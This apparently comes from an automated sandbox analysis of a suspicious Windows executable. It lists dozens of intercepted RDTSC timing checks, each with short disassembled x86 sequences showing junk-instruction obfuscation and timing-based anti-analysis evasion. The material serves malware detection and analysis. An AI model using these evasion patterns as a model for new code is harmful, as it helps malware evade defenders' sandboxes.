                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F20DD6 second address: F20DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F21070 second address: F21078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F21078 second address: F21098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FCA18DB50E6h 0x0000000c popad 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FCA18DB50EDh 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F2178D second address: F217A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FCA18C4F696h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F217A1 second address: F217A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F218BA second address: F218C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F218C0 second address: F218C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F218C4 second address: F218E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F69Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a jne 00007FCA18C4F6B0h 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F23513 second address: F23519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F23519 second address: F2351D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F2351D second address: F23521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F275F3 second address: F27609 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F276CB second address: F276F0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FCA18DB50F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007FCA18DB50F0h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F278A1 second address: F278ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FCA18C4F698h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 clc 0x00000023 push 00000004h 0x00000025 jl 00007FCA18C4F6A2h 0x0000002b js 00007FCA18C4F69Ch 0x00000031 sub edx, 474FCA12h 0x00000037 push E5288972h 0x0000003c push eax 0x0000003d push edx 0x0000003e jno 00007FCA18C4F698h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F278ED second address: F278F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F278F3 second address: F278F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F29051 second address: F29057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: F2B02F second address: F2B035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54705FD second address: 5470641 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FCA18DB50EEh 0x0000000d push eax 0x0000000e pushad 0x0000000f push ebx 0x00000010 mov al, 26h 0x00000012 pop edx 0x00000013 jmp 00007FCA18DB50F6h 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d call 00007FCA18DB50ECh 0x00000022 pop eax 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470641 second address: 54706FB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FCA18C4F69Bh 0x00000008 and si, 355Eh 0x0000000d jmp 00007FCA18C4F6A9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jmp 00007FCA18C4F6A0h 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e mov dh, cl 0x00000020 push ebx 0x00000021 mov dh, ah 0x00000023 pop ebx 0x00000024 popad 0x00000025 xchg eax, ecx 0x00000026 pushad 0x00000027 call 00007FCA18C4F6A3h 0x0000002c movzx esi, bx 0x0000002f pop ebx 0x00000030 popad 0x00000031 push eax 0x00000032 pushad 0x00000033 mov edi, 021B8594h 0x00000038 pushfd 0x00000039 jmp 00007FCA18C4F69Dh 0x0000003e or cx, 9656h 0x00000043 jmp 00007FCA18C4F6A1h 0x00000048 popfd 0x00000049 popad 0x0000004a xchg eax, ecx 0x0000004b jmp 00007FCA18C4F69Eh 0x00000050 xchg eax, esi 0x00000051 pushad 0x00000052 jmp 00007FCA18C4F69Eh 0x00000057 mov ch, D2h 0x00000059 popad 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54706FB second address: 54706FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54706FF second address: 5470703 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470703 second address: 5470709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470709 second address: 5470785 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FCA18C4F69Eh 0x00000009 jmp 00007FCA18C4F6A5h 0x0000000e popfd 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, esi 0x00000015 jmp 00007FCA18C4F69Ch 0x0000001a lea eax, dword ptr [ebp-04h] 0x0000001d pushad 0x0000001e jmp 00007FCA18C4F69Dh 0x00000023 popad 0x00000024 nop 0x00000025 jmp 00007FCA18C4F69Eh 0x0000002a push eax 0x0000002b jmp 00007FCA18C4F69Bh 0x00000030 nop 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FCA18C4F6A0h 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470785 second address: 547078B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54707E3 second address: 54707E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 547084B second address: 5470851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470851 second address: 5470855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470855 second address: 54708A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, esi 0x0000000a pushad 0x0000000b jmp 00007FCA18DB50EDh 0x00000010 pushfd 0x00000011 jmp 00007FCA18DB50F0h 0x00000016 adc esi, 6CD37298h 0x0000001c jmp 00007FCA18DB50EBh 0x00000021 popfd 0x00000022 popad 0x00000023 pop esi 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FCA18DB50F5h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54708A9 second address: 546016B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 91C2h 0x00000007 mov dx, 080Eh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e leave 0x0000000f jmp 00007FCA18C4F6A5h 0x00000014 retn 0004h 0x00000017 nop 0x00000018 sub esp, 04h 0x0000001b xor ebx, ebx 0x0000001d cmp eax, 00000000h 0x00000020 je 00007FCA18C4F7FAh 0x00000026 mov dword ptr [esp], 0000000Dh 0x0000002d call 00007FCA1D43B989h 0x00000032 mov edi, edi 0x00000034 pushad 0x00000035 mov eax, edx 0x00000037 mov dx, 1C0Ch 0x0000003b popad 0x0000003c push ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 pushad 0x00000041 popad 0x00000042 mov eax, edx 0x00000044 popad 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 546016B second address: 5460195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 call 00007FCA18DB50F7h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ebx, ecx 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460195 second address: 54601CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FCA18C4F6A0h 0x00000010 sub esp, 2Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop eax 0x00000018 mov cl, bl 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54601CE second address: 54601F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCA18DB50F5h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54601F5 second address: 546023C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007FCA18C4F6A3h 0x0000000b jmp 00007FCA18C4F6A3h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FCA18C4F6A4h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 546023C second address: 5460286 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 55ECDD14h 0x00000008 mov ch, dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FCA18DB50F2h 0x00000015 and ch, FFFFFFC8h 0x00000018 jmp 00007FCA18DB50EBh 0x0000001d popfd 0x0000001e mov bh, ah 0x00000020 popad 0x00000021 push edx 0x00000022 pushad 0x00000023 movsx edi, ax 0x00000026 popad 0x00000027 mov dword ptr [esp], edi 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FCA18DB50EBh 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460286 second address: 546028C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 546028C second address: 5460290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54602FB second address: 546034A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ebx 0x0000000a pushad 0x0000000b movzx eax, di 0x0000000e pushfd 0x0000000f jmp 00007FCA18C4F6A1h 0x00000014 or esi, 51D8BA16h 0x0000001a jmp 00007FCA18C4F6A1h 0x0000001f popfd 0x00000020 popad 0x00000021 test al, al 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 546034A second address: 5460350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460350 second address: 5460385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FCA18C4F85Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FCA18C4F6A7h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54603C1 second address: 5460404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FCA18DB50EBh 0x0000000f jmp 00007FCA18DB50F3h 0x00000014 popfd 0x00000015 call 00007FCA18DB50F8h 0x0000001a pop esi 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460404 second address: 5460425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 46ADh 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007FCA18C4F69Bh 0x00000017 pop ecx 0x00000018 mov ah, dl 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460573 second address: 5460577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460577 second address: 546057D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 546057D second address: 5460583 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460583 second address: 54605A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCA18C4F6A8h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54605A6 second address: 54605D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov di, ax 0x0000000e mov di, si 0x00000011 popad 0x00000012 nop 0x00000013 pushad 0x00000014 movzx esi, dx 0x00000017 mov ecx, edx 0x00000019 popad 0x0000001a push eax 0x0000001b pushad 0x0000001c mov bh, B1h 0x0000001e popad 0x0000001f nop 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54605D2 second address: 54605D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54605D6 second address: 54605DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54605DC second address: 5460627 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edx, si 0x00000010 pushfd 0x00000011 jmp 00007FCA18C4F6A6h 0x00000016 adc eax, 41869358h 0x0000001c jmp 00007FCA18C4F69Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460627 second address: 546062D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 546062D second address: 5460631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460631 second address: 5460671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FCA18DB50F3h 0x00000012 sub ah, FFFFFFCEh 0x00000015 jmp 00007FCA18DB50F9h 0x0000001a popfd 0x0000001b mov ch, 10h 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460671 second address: 546068E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F69Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCA18C4F69Ah 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 546068E second address: 5460692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460692 second address: 5460698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460698 second address: 546069F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54606B2 second address: 54606B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54606B6 second address: 54606BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54606BC second address: 54606C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54606C2 second address: 54606F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a jmp 00007FCA18DB50EEh 0x0000000f test esi, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FCA18DB50F7h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54606F5 second address: 5460025 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FCA8928D5D9h 0x0000000f xor eax, eax 0x00000011 jmp 00007FCA18C28DCAh 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e sub esp, 04h 0x00000021 mov esi, eax 0x00000023 xor ebx, ebx 0x00000025 cmp esi, 00000000h 0x00000028 je 00007FCA18C4F7D5h 0x0000002e call 00007FCA1D43B6DCh 0x00000033 mov edi, edi 0x00000035 jmp 00007FCA18C4F69Dh 0x0000003a xchg eax, ebp 0x0000003b jmp 00007FCA18C4F69Eh 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460025 second address: 5460041 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460041 second address: 5460068 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F69Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCA18C4F6A5h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460068 second address: 5460078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA18DB50ECh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460078 second address: 546007C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 546007C second address: 5460092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCA18DB50EAh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54600E6 second address: 54600EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54600EA second address: 5460107 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460107 second address: 5460145 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 01h 0x00000005 pushfd 0x00000006 jmp 00007FCA18C4F6A8h 0x0000000b add cx, 2F68h 0x00000010 jmp 00007FCA18C4F69Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 leave 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov edx, 34F0D6D6h 0x00000022 mov dl, 8Ah 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460145 second address: 546014B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 546014B second address: 546014F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460A10 second address: 5460A2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460B18 second address: 5460B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460B1C second address: 5460B2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460B56 second address: 5460B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460B5A second address: 5460B5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460B5E second address: 5460B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
